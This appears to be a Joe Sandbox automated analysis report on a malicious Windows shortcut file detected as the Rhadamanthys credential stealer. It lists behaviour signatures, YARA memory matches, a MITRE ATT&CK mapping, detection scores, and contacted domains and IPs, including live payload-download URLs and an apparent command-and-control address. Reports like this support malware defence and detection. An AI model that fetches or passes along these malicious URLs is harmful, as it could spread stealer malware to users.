Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1770896929.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1776058273.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774245020.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1772517480.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1661729076.000000001BA01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1751813778.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1764199832.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1758049624.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1767980994.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1745060493.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1765364016.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1730971445.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1759435128.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1749345129.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1748274287.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1627889710.000001F9DF920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1770471428.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1737974066.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1733891571.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1775675719.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1758603457.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1738781521.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1750663652.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1766830436.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1737361189.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1746053538.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1735264963.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1771728010.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1764871739.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1732324317.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1602767929.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752123123.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1739761324.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1738314505.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1749877777.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1754168196.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1726579095.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1734444495.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752709890.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1753586274.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1748873710.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1742093895.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1763763009.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1745501240.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1755359019.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774918323.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1736566513.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1748590947.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1756177662.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1757743595.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1773734067.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1735678354.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1740296656.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1756708487.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752460608.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1744204587.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1731959678.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1740765343.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1726579095.000001F9E0C91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1736978478.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1750934596.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1731676215.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1751248603.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1753303535.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1766516787.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1767428012.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1755616290.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1731420429.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1765992633.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1750138359.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1754962335.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1742638722.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1747838363.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1742967878.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1736196050.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1754590766.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1751538386.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774468300.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1757113350.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1761379644.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1743292419.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D286B50 bind,WSAGetLastError,closesocket,	4_2_00007FF63D286B50
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D286860 bind,listen,WSAGetLastError,closesocket,	4_2_00007FF63D286860
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0416860 bind,listen,WSAGetLastError,closesocket,	18_2_00007FF7F0416860
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0416B50 bind,WSAGetLastError,closesocket,	18_2_00007FF7F0416B50

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	21 Input Capture	4 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	112 Command and Scripting Interpreter	Logon Script (Windows)	412 Process Injection	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	26 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	1 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	NTDS	121 Security Software Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fBcMVl6ns6.lnk	26%	ReversingLabs	Shortcut.Trojan.Rhadamanthys
fBcMVl6ns6.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\ajbs50ul.bat	63%	ReversingLabs	Win64.Spyware.Rhadamanthys
C:\Users\user\AppData\Roaming\Gga6.ini	46%	ReversingLabs	Win64.Packed.Generic
C:\Users\user\AppData\Roaming\M08e.ini	12%	ReversingLabs
C:\Users\user\Desktop\utox_x86_x64.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bemostake.space	188.114.96.3	true	false	unknown
1h982d.bemostake.space	188.114.96.3	true	false	unknown
rocketdocs.lol	188.114.97.3	true	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm	true	unknown
https://rocketdocs.lol/utox_x86.exe	false	unknown
https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe	false	unknown
https://1h982d.bemostake.space/test.txt	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1664031768.000001BDD4C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1664031768.000001BDD4ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.w	powershell.exe, 00000005.00000002.1601177938.000001F3F4E9D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1597108569.000001F3F4CB3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://1h982d.bemostake.space	powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.	powershell.exe, 00000005.00000002.1601177938.000001F3F4E9D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://1h982d.bp24mostakp24.spacp24/tp24st.txt	powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rocketdocs.lol	powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1664031768.000001BDD4C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1664031768.000001BDD4ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://rocketdocs.lol	powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.1576576024.000001BDC4A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1553322256.000001F3DC7C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.$	powershell.exe, 00000013.00000002.2125075305.000002403AAD9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://bemostake.space	powershell.exe, 00000003.00000002.1576576024.000001BDC61FA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bemostake.space	powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1576576024.000001BDC4A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1553322256.000001F3DC7C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://1h982d.bemostake.space	powershell.exe, 00000003.00000002.1576576024.000001BDC6106000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.93.190.6	unknown	Ukraine	15713	GCN-UA	false
148.251.23.146	unknown	Germany	24940	HETZNER-ASDE	false
104.233.104.126	unknown	Saudi Arabia	13886	CLOUD-SOUTHUS	false
163.172.136.118	unknown	United Kingdom	12876	OnlineSASFR	false
95.215.44.78	unknown	Latvia	52173	MAKONIXLV	false
193.124.186.205	unknown	Russian Federation	35196	IHOR-ASRU	false
46.29.238.96	unknown	Russian Federation	34804	EUROTELECOM-ASRU	true
8.8.8.8	unknown	United States	15169	GOOGLEUS	false
37.97.185.116	unknown	Netherlands	20857	TRANSIP-ASAmsterdamtheNetherlandsNL	false
130.133.110.14	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
194.249.212.109	unknown	Slovenia	2107	ARNES-NETAcademicandResearchNetworkofSloveniaSI	false
136.243.141.187	unknown	Germany	24940	HETZNER-ASDE	false
37.187.122.30	unknown	France	16276	OVHFR	false
147.45.126.71	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
185.14.30.213	unknown	Ukraine	21100	ITLDC-NLUA	false
185.58.206.164	unknown	Russian Federation	35196	IHOR-ASRU	false
51.254.84.212	unknown	France	16276	OVHFR	false
80.87.193.193	unknown	Russian Federation	29182	THEFIRST-ASRU	false
46.229.52.198	unknown	Ukraine	34056	KIEVNETKievNetISPASUA	false
104.223.122.15	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	true
188.114.97.3	rocketdocs.lol	European Union	13335	CLOUDFLARENETUS	false
205.185.116.116	unknown	United States	53667	PONYNETUS	false
85.21.144.224	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
85.130.224.235	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	false
188.114.96.3	bemostake.space	European Union	13335	CLOUDFLARENETUS	false
185.196.9.174	unknown	Switzerland	42624	SIMPLECARRIERCH	true
198.98.51.198	unknown	United States	53667	PONYNETUS	false

Private

IP
192.168.2.8
192.168.2.7
192.168.2.9
192.168.2.5
192.168.2.255

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529310
Start date and time:	2024-10-08 20:51:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fBcMVl6ns6.lnk renamed because original name is a hash value
Original Sample Name:	5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@30/20@3/32
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95
